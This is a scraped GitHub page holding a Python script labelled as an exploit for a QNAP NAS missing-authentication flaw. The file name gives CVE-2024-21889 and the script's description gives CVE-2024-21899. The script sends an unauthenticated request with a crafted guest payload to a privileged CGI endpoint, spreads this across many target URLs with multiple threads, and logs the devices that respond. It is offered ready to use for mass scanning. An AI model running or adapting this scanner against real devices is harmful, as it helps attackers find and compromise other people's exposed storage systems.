-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathQNAP-NAS_CVE-2024-21889_Exploit.py
76 lines (60 loc) · 2.43 KB
/
QNAP-NAS_CVE-2024-21889_Exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
# 作者: VulnExpo
# 日期: 2024-03-20
import requests
import argparse
import threading
import httplib2
import random
import re
import string
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def check_for_vulnerability(url, proxies=None, success_file=None):
data="wiz_func=start_2sv&action=none&user=guest&pwd=none"
headers = {'User-Agent': 'curl/8.6.0', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
try:
response = requests.post(url+"/cgi-bin/priv/privWizard.cgi",data=data,verify=False, timeout=5,headers=headers)
if response.status_code==200 and "<version>" in response.text:
print(f"目标URL: {url}")
with open(success_file, 'a') as s_file:
s_file.write(f"++++++++++++++++++\n")
s_file.write(f"目标URL: {url}\n")
s_file.write(f"响应内容: {response.text}\n\n")
return True
except Exception as e:
print(f"发生异常:{e}")
return False
def scan_targets(targets, proxies=None, success_file=None):
for target in targets:
target = target.strip()
check_for_vulnerability(target, proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
threads = []
for i in range(num_threads):
thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="QNAP NAS身份验证缺失漏洞CVE-2024-21899")
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
args = parser.parse_args()
if not args.url and not args.file:
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
exit(1)
if args.url:
urls = [args.url]
elif args.file:
with open(args.file, 'r') as file:
urls = file.readlines()
success_file = 'success_targets.txt'
proxies = {
"http": args.proxy,
"https": args.proxy
} if args.proxy else None
multi_threaded_scan(urls, proxies, success_file, args.threads)
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")